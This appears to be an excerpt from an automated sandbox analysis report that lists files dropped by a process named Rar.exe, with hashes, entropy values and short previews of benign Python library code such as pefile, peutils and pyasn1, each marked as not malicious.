                                                                                                                                                                                                                                  SSDEEP:96:BDAoI1tG/mVfkuwlUDgaHEUxYQrM9n3whwHG28xGSl0teuzKbzRm3PPwsZvGeM2v:NutGuVfkuwlwZEdQr8ghwHD8xDlfuzKk
                                                                                                                                                                                                                                  MD5:70092C332A79257F8A91CDFE492E78DE
                                                                                                                                                                                                                                  SHA1:FB815283667175A2BF9A13F38432B1AA4C199A0D
                                                                                                                                                                                                                                  SHA-256:0879CE2FEE63D738838F61332E69A149D463C177649C78935295D7F335604810
                                                                                                                                                                                                                                  SHA-512:70DBCDB6E846D2F1E03863A1FD46009677CD91A2115D376D0AD7E2D6D7B50C074193B3DB7314FF13BA2C22128A85D99C3C9B171525E530B4F715B23CAB844B55
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ord_names = {. 1: b"accept",. 2: b"bind",. 3: b"closesocket",. 4: b"connect",. 5: b"getpeername",. 6: b"getsockname",. 7: b"getsockopt",. 8: b"htonl",. 9: b"htons",. 10: b"ioctlsocket",. 11: b"inet_addr",. 12: b"inet_ntoa",. 13: b"listen",. 14: b"ntohl",. 15: b"ntohs",. 16: b"recv",. 17: b"recvfrom",. 18: b"select",. 19: b"send",. 20: b"sendto",. 21: b"setsockopt",. 22: b"shutdown",. 23: b"socket",. 24: b"WSApSetPostRoutine",. 25: b"FreeAddrInfoEx",. 26: b"FreeAddrInfoExW",. 27: b"FreeAddrInfoW",. 28: b"GetAddrInfoExA",. 29: b"GetAddrInfoExCancel",. 30: b"GetAddrInfoExOverlappedResult",. 31: b"GetAddrInfoExW",. 32: b"GetAddrInfoW",. 33: b"GetHostNameW",. 34: b"GetNameInfoW",. 35: b"InetNtopW",. 36: b"InetPtonW",. 37: b"ProcessSocketNotifications",. 38: b"SetAddrInfoExA",. 39: b"SetAddrInfoExW",. 40: b"WPUCompleteOverlappedRequest",. 41: b"WPUGetProviderPathEx",.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2034
                                                                                                                                                                                                                                  Entropy (8bit):4.820599276510261
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:FXXw0Av8HuQVJdwStlCDbqSfCVEKN5frM:Bw0QuuStMD0hrM
                                                                                                                                                                                                                                  MD5:AC59F5DD55D0A14982C4F5FB09C0C2ED
                                                                                                                                                                                                                                  SHA1:A3270E630BA5C1B1FA78C5C4931BC87ACB3BA7B2
                                                                                                                                                                                                                                  SHA-256:F029BC58669EAE582A7087C630FD8BE8F9F5AA2DF6F7CECAA13F8F1E1199ED17
                                                                                                                                                                                                                                  SHA-512:2CB4D9F5286439A6FBB5499E07B49571BEA4D8BC1DC99552A002EB47B27A698D5692FC9A4805C40A87A0D395C35B8E5BFAD66B11941DB206A7676464988FE1F5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ord_names = {.. 1: b"accept",.. 2: b"bind",.. 3: b"closesocket",.. 4: b"connect",.. 5: b"getpeername",.. 6: b"getsockname",.. 7: b"getsockopt",.. 8: b"htonl",.. 9: b"htons",.. 10: b"inet_addr",.. 11: b"inet_ntoa",.. 12: b"ioctlsocket",.. 13: b"listen",.. 14: b"ntohl",.. 15: b"ntohs",.. 16: b"recv",.. 17: b"recvfrom",.. 18: b"select",.. 19: b"send",.. 20: b"sendto",.. 21: b"setsockopt",.. 22: b"shutdown",.. 23: b"socket",.. 24: b"MigrateWinsockConfiguration",.. 51: b"gethostbyaddr",.. 52: b"gethostbyname",.. 53: b"getprotobyname",.. 54: b"getprotobynumber",.. 55: b"getservbyname",.. 56: b"getservbyport",.. 57: b"gethostname",.. 101: b"WSAAsyncSelect",.. 102: b"WSAAsyncGetHostByAddr",.. 103: b"WSAAsyncGetHostByName",.. 104: b"WSAAsyncGetProtoByNumber",.. 105: b"WSAAsyncGetProtoByName",.. 106: b"WSAAsyncGetServByPort",.. 107: b"WSAAsyncGetServByName",.. 108: b"WSACancelAsyn
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):301767
                                                                                                                                                                                                                                  Entropy (8bit):4.463092734602072
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:BvtS2gjLit2BVa1a4l68GiuZJeS69HZYSIsHWlURlEL:BzgjetUx4wdV
                                                                                                                                                                                                                                  MD5:5089B6CD006941C44BFFF58DFBD321F7
                                                                                                                                                                                                                                  SHA1:07C6A9A0949EC2FC53D51A15683AAD0AE002157E
                                                                                                                                                                                                                                  SHA-256:0D0EB68F0F169182613DC64B3AB50B20855508C1C1D2FAAFE8FCCF23EDB6A345
                                                                                                                                                                                                                                  SHA-512:73BE5A643840D66BAF6AAD00477D43D2CA2261AE80D4BCB5C5D7DF0C2C43CCB702FFE3077077EB9B5046425E9673BF008D9128EBBF203762212A5A699E2FEB66
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#!/usr/bin/python.."""pefile, Portable Executable reader module..All the PE file basic structures are available with their default names as.attributes of the instance returned...Processed elements such as the import table are made available with lowercase.names, to differentiate them from the upper case basic structure names...pefile has been tested against many edge cases such as corrupted and malformed.PEs as well as malware, which often attempts to abuse the format way beyond its.standard use. To the best of my knowledge most of the abuse is handled.gracefully...Copyright (c) 2005-2024 Ero Carrera <ero.carrera@gmail.com>."""..__author__ = "Ero Carrera".__version__ = "2024.8.26".__contact__ = "ero.carrera@gmail.com"..import codecs.import collections.import copy as copymod.import functools.import gc.import math.import mmap.import os.import string.import struct.import time.import uuid.from collections import Counter.from hashlib import md5, sha1, sha256, sha512.from typing import Union
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18367
                                                                                                                                                                                                                                  Entropy (8bit):4.142618817490758
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:g3G4Y3g6i9MPSZkn2ozg2orTiprYAvpz/q:oG4hfiZn2Qg2AwYoS
                                                                                                                                                                                                                                  MD5:47F6D1E5CB423179240A4F3DC0EBA3FE
                                                                                                                                                                                                                                  SHA1:A7F09A9FBEA2D9A34F106DA6B829E96A033F642F
                                                                                                                                                                                                                                  SHA-256:09C314F4B955575D7C0CD3D86BD555FFADBD931112B1E2A922C6EAC5F5FB4D54
                                                                                                                                                                                                                                  SHA-512:C3366FA115E19DBA62A01461E476C3BDB6711F9A93B00966C8ECF3C7A15EBF27D730AC07B5FC6DB467E46E3AD7B18A87592BB0E487DEC5B8900CBC7237B89340
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:."""peutils, Portable Executable utilities module...Copyright (c) 2005-2023 Ero Carrera <ero.carrera@gmail.com>..All rights reserved..""".import os.import re.import string.import urllib.error.import urllib.parse.import urllib.request..import pefile..__author__ = "Ero Carrera".__version__ = pefile.__version__.__contact__ = "ero.carrera@gmail.com"...class SignatureDatabase:. """This class loads and keeps a parsed PEiD signature database... Usage:.. sig_db = SignatureDatabase('/path/to/signature/file').. and/or.. sig_db = SignatureDatabase(). sig_db.load('/path/to/signature/file').. Signature databases can be combined by performing multiple loads... The filename parameter can be a URL too. In that case the. signature database will be downloaded from that location.. """.. def __init__(self, filename=None, data=None):.. # RegExp to match a signature block. #. self.parse_sig = re.compile(. r"\[(.*?)\]\s+?signature\s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66
                                                                                                                                                                                                                                  Entropy (8bit):4.608121581184648
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SHWfrSLqgOAbV9N4MLvYnPn:SHWfGLqhAxRYPn
                                                                                                                                                                                                                                  MD5:0AD7C7B33183D588D001BE929EF9761A
                                                                                                                                                                                                                                  SHA1:FFF1F3360360AEA1108F55D3133B8173CED480FB
                                                                                                                                                                                                                                  SHA-256:B5CE16BA552FE1992992656D79EF7E16C81CEA08BD8D9147D5521B02F4968F7B
                                                                                                                                                                                                                                  SHA-512:8B3D1D475C63868471D478DD5FAB10D41CC6B963C612846706836518820D6DFD710B3B50284F4222ED627EBA74E1AF61353FCC17FC67F7993A02C5637602AD9F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# https://www.python.org/dev/peps/pep-0396/.__version__ = '0.6.1'.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79192
                                                                                                                                                                                                                                  Entropy (8bit):4.267001943836025
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:H8yAMLWEfmqqB6kfZHoWkf7EPbo3gJwd/JcIk+A:H8yAMLWEfmqqB6kfZHoWkf7EPbo3gJyK
                                                                                                                                                                                                                                  MD5:9F23FCD79FD7771CC62EBDD3BB9D0C41
                                                                                                                                                                                                                                  SHA1:8582FE4C98C1A0573A431F442E62B27258521691
                                                                                                                                                                                                                                  SHA-256:1D959CDCCF78D3A6E1029B8917E4C062945F2D6BD04F9E02AD1103A833325346
                                                                                                                                                                                                                                  SHA-512:BAF3732EBD7115EDCD2C800B5BE5687E5055C75E4D3E46CF7F62D0B049ED1B0C6110744521211FDF3FF89FB76144B668B45C79F286080C82A9FFCE06D7BB6554
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import io.import os.import sys.import warnings..from pyasn1 import debug.from pyasn1 import error.from pyasn1.codec.ber import eoo.from pyasn1.codec.streaming import asSeekableStream.from pyasn1.codec.streaming import isEndOfStream.from pyasn1.codec.streaming import peekIntoStream.from pyasn1.codec.streaming import readFromStream.from pyasn1.compat import _MISSING.from pyasn1.error import PyAsn1Error.from pyasn1.type import base.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import tagmap.from pyasn1.type import univ.from pyasn1.type import useful..__all__ = ['StreamingDecoder', 'Decoder', 'decode']..LOG = debug.registerLoggee(__name__, flags=debug.DEBUG_DECODER)..noValue = base.noValue..SubstrateUnderrunError = error.SubstrateUnderrunError...class AbstractPayloadDecoder(object):. protoCom
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29796
                                                                                                                                                                                                                                  Entropy (8bit):4.457977497334843
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:RN6QSj8gQPOPRDusCbhbPnMywJRAoWdun5vSIgPPSOdvXdK1s+0x3PUUjM1QA:RN6QSj8gQPOPCwJRAoWdun5vSIgPPSOG
                                                                                                                                                                                                                                  MD5:C20EF3AC7D8B0C233083122BB4742188
                                                                                                                                                                                                                                  SHA1:A1D576D7E558404AD781D201912825EE06C32915
                                                                                                                                                                                                                                  SHA-256:78EFFEFB96FED075E63E9216D8985895E8D4E95EC5C1D39199717209F287CB32
                                                                                                                                                                                                                                  SHA-512:D0D0E354762245FAA1ABB63F72830B7AF77EB6FECDA0DFBB59498467020ECB8DCA31275FC79B7554B6080974FB5442CB27A9BDA6D2C1E4AA2E07EE090E46FEF2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import sys.import warnings..from pyasn1 import debug.from pyasn1 import error.from pyasn1.codec.ber import eoo.from pyasn1.compat import _MISSING.from pyasn1.compat.integer import to_bytes.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import univ.from pyasn1.type import useful..__all__ = ['Encoder', 'encode']..LOG = debug.registerLoggee(__name__, flags=debug.DEBUG_ENCODER)...class AbstractItemEncoder(object):. supportIndefLenMode = True.. # An outcome of otherwise legit call `encodeFun(eoo.endOfOctets)`. eooIntegerSubstrate = (0, 0). eooOctetsSubstrate = bytes(eooIntegerSubstrate).. # noinspection PyMethodMayBeStatic. def encodeTag(self, singleTag, isConstructed):. tagClass, tagFormat, tagId = singleTag. encodedTag = tagClass | tagFormat. if isConstruct
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):639
                                                                                                                                                                                                                                  Entropy (8bit):4.884028935699989
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:L6FLCXLGnw2QC+CDexoDexyRYXjsidW9J5qjk2TjZ1YkxNOtz8:viw2QC+CDJD1UsBqg2THRNu8
                                                                                                                                                                                                                                  MD5:C3E4126104E2EF8128432E37E6989AD8
                                                                                                                                                                                                                                  SHA1:31C3FBBEDCCCCE5DF46F60FC9A58BE142DB9A86B
                                                                                                                                                                                                                                  SHA-256:76CA4B29CDB1AFF5B94DB72BD9671F2DDFDB24B84E8E8B6AD58C4A9F70C240D2
                                                                                                                                                                                                                                  SHA-512:AD1B4F475CD30516A7CB950E8344C1B0CCB430E1411A2396316134515B0A00F4EC2B892592653B988E09F958AD928C2C1D3BE1DDF7526C081FC61AEB56425D66
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.from pyasn1.type import base.from pyasn1.type import tag..__all__ = ['endOfOctets']...class EndOfOctets(base.SimpleAsn1Type):. defaultValue = 0. tagSet = tag.initTagSet(. tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x00). ).. _instance = None.. def __new__(cls, *args, **kwargs):. if cls._instance is None:. cls._instance = object.__new__(cls, *args, **kwargs).. return cls._instance...endOfOctets = EndOfOctets().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4589
                                                                                                                                                                                                                                  Entropy (8bit):5.092475796325964
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:lip6oyPkf/vadzSzRJqs+YCJzseUkRzM4x7aJg8eiHCA:lm6XPkfHadzSzrq1YCJzs1kRDn8eiiA
                                                                                                                                                                                                                                  MD5:D5A81ACC3F570229E2699C464032D0A4
                                                                                                                                                                                                                                  SHA1:87C99BF231930448E6D80669C0ECBEAAE931D81E
                                                                                                                                                                                                                                  SHA-256:4B6EFDFCB463C07C93501BAFE0B3D83A989BD57E212E6061FF77ADE3DA1C9B80
                                                                                                                                                                                                                                  SHA-512:DDD60F87BFFE79329DF0DB09049756AE4944A9803347DA38AECE4AD1A27517D9DA31055F99B79B148B1A60772B7E09A894C1FED39B85BC231436BE1371E6039E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1 import error.from pyasn1.codec.streaming import readFromStream.from pyasn1.codec.ber import decoder.from pyasn1.type import univ..__all__ = ['decode', 'StreamingDecoder']..SubstrateUnderrunError = error.SubstrateUnderrunError...class BooleanPayloadDecoder(decoder.AbstractSimplePayloadDecoder):. protoComponent = univ.Boolean(0).. def valueDecoder(self, substrate, asn1Spec,. tagSet=None, length=None, state=None,. decodeFun=None, substrateFun=None,. **options):.. if length != 1:. raise error.PyAsn1Error('Not single-octet Boolean payload').. for chunk in readFromStream(substrate, length, options):. if isinstance(chunk, SubstrateUnderrunError):. yield chunk.. byte = chunk[0
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9838
                                                                                                                                                                                                                                  Entropy (8bit):4.809746660729571
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:l9W9lxp8638xHT6oGst1V/Ueo8IBqlTHRYkFGDRC2260kNtdslA:lMq6oGg1NfWCRYkFGDRC2ykNtdslA
                                                                                                                                                                                                                                  MD5:AB5C0BD7E6C4E19EB77C5202B9072477
                                                                                                                                                                                                                                  SHA1:CC88103FC5B4AAD7678473B2E1D89A09CC30FA72
                                                                                                                                                                                                                                  SHA-256:BEC1AB80E1C9A244DE66A049C0D1A891E8EFA87E447D3BF2F2113177F8F96DB6
                                                                                                                                                                                                                                  SHA-512:95F50A7665678DE63544B31EB0498C24189359347B1DC52FBCDDA2D0E910E13521C7C6449B76ECB0D0025417E7B89CF604C5AF7623CE1B3A7B888DDD812843E3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1 import error.from pyasn1.codec.ber import encoder.from pyasn1.type import univ.from pyasn1.type import useful..__all__ = ['Encoder', 'encode']...class BooleanEncoder(encoder.IntegerEncoder):. def encodeValue(self, value, asn1Spec, encodeFun, **options):. if value == 0:. substrate = (0,). else:. substrate = (255,). return substrate, False, False...class RealEncoder(encoder.RealEncoder):. def _chooseEncBase(self, value):. m, b, e = value. return self._dropFloatingPoint(m, b, e)...# specialized GeneralStringEncoder here..class TimeEncoderMixIn(object):. Z_CHAR = ord('Z'). PLUS_CHAR = ord('+'). MINUS_CHAR = ord('-'). COMMA_CHAR = ord(','). DOT_CHAR = ord('.'). ZERO_CHAR = ord('0').. MIN_LENGTH = 12. MAX_LENGT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3428
                                                                                                                                                                                                                                  Entropy (8bit):5.148297897589633
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:lb6a5VzZz4qsOCJzseUkazT4xQaJx8MOiZBCA:lb6a5VzZz4qtCJzs1kazi8MOiZYA
                                                                                                                                                                                                                                  MD5:EE0CB17D8EE0D8BF236E88EF140214BB
                                                                                                                                                                                                                                  SHA1:CE07FDD44D07346A1722A9055BBAA199511FF89C
                                                                                                                                                                                                                                  SHA-256:18EA4A675C0545853410417791298868C7DED61DB0D7B55D1AEE7B00752A405C
                                                                                                                                                                                                                                  SHA-512:326D54257678248FA51808A654FD047C9BF5E136EA0923856AD995ED6EDF6088D2278D59C80F7B6B3085E19499FD11DC39888B941FF23DA025AC55F69046EAAB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1.codec.cer import decoder.from pyasn1.type import univ..__all__ = ['decode', 'StreamingDecoder']...class BitStringPayloadDecoder(decoder.BitStringPayloadDecoder):. supportConstructedForm = False...class OctetStringPayloadDecoder(decoder.OctetStringPayloadDecoder):. supportConstructedForm = False...# TODO: prohibit non-canonical encoding.RealPayloadDecoder = decoder.RealPayloadDecoder..TAG_MAP = decoder.TAG_MAP.copy().TAG_MAP.update(. {univ.BitString.tagSet: BitStringPayloadDecoder(),. univ.OctetString.tagSet: OctetStringPayloadDecoder(),. univ.Real.tagSet: RealPayloadDecoder()}.)..TYPE_MAP = decoder.TYPE_MAP.copy()..# Put in non-ambiguous types for faster codec lookup.for typeDecoder in TAG_MAP.values():. if typeDecoder.protoComponent is not None:. typeId = typeDec
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3479
                                                                                                                                                                                                                                  Entropy (8bit):4.989016725995753
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:lmJ9RUn8ldU5etKvLJY2l1ocwekN0JwU5KnwaQOoCA:lmJX/UMQY2l1kN47aQOnA
                                                                                                                                                                                                                                  MD5:6B0B1898834BC861E9452BF77568395E
                                                                                                                                                                                                                                  SHA1:79DC83CC60A6367BD546ED382932DFEB1EF39A4A
                                                                                                                                                                                                                                  SHA-256:95DC6BA6F5C316CC4BC6DBCDEDA891EB524D36D6A29CD6A06424A9B1933D0D9B
                                                                                                                                                                                                                                  SHA-512:DF031B5A9F72A1AB8BFB1B6FC2B51A34EFE20B84660DA9D8763015F0A8B0CE5AC6CB414C56781EFDC190B252D65638D4F92591F0CF005BEF440EF8F38C6700A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1 import error.from pyasn1.codec.cer import encoder.from pyasn1.type import univ..__all__ = ['Encoder', 'encode']...class SetEncoder(encoder.SetEncoder):. @staticmethod. def _componentSortKey(componentAndType):. """Sort SET components by tag.. Sort depending on the actual Choice value (dynamic sort). """. component, asn1Spec = componentAndType.. if asn1Spec is None:. compType = component. else:. compType = asn1Spec.. if compType.typeId == univ.Choice.typeId and not compType.tagSet:. if asn1Spec is None:. return component.getComponent().tagSet. else:. # TODO: move out of sorting key function. names = [namedType.name for namedType in asn1Spec.componentT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9118
                                                                                                                                                                                                                                  Entropy (8bit):4.976000713948337
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:l5I+VTlaQp/jaDx+mo9L0i6Yxq1AUMmHGJb5CcolZ1TloUq5/XlI2a5h2WVZx7+N:l5nVTlas/jaV+mo9L0i6Yxq1AUMmHGJb
                                                                                                                                                                                                                                  MD5:ED2CB4DE386A31E901C60F4D620D454E
                                                                                                                                                                                                                                  SHA1:1A9DC00FC8F90FB480C6C572BA3A1AFE74445D51
                                                                                                                                                                                                                                  SHA-256:DAF2BD074009CCB4F67B148DB65094958CD9BE6D04EC8CD453C62083F94BC4DA
                                                                                                                                                                                                                                  SHA-512:532F86F453D60BC55959EDBEE0A1D8A936A1ADBB48A80E63E158DE5A324DD9BB9A4B014ED9E870F26817BA4E78A8EAE70FD16008FA09856775A3BEB00A6A471F
                                                                                                                                                                                                                                  Malicious:false
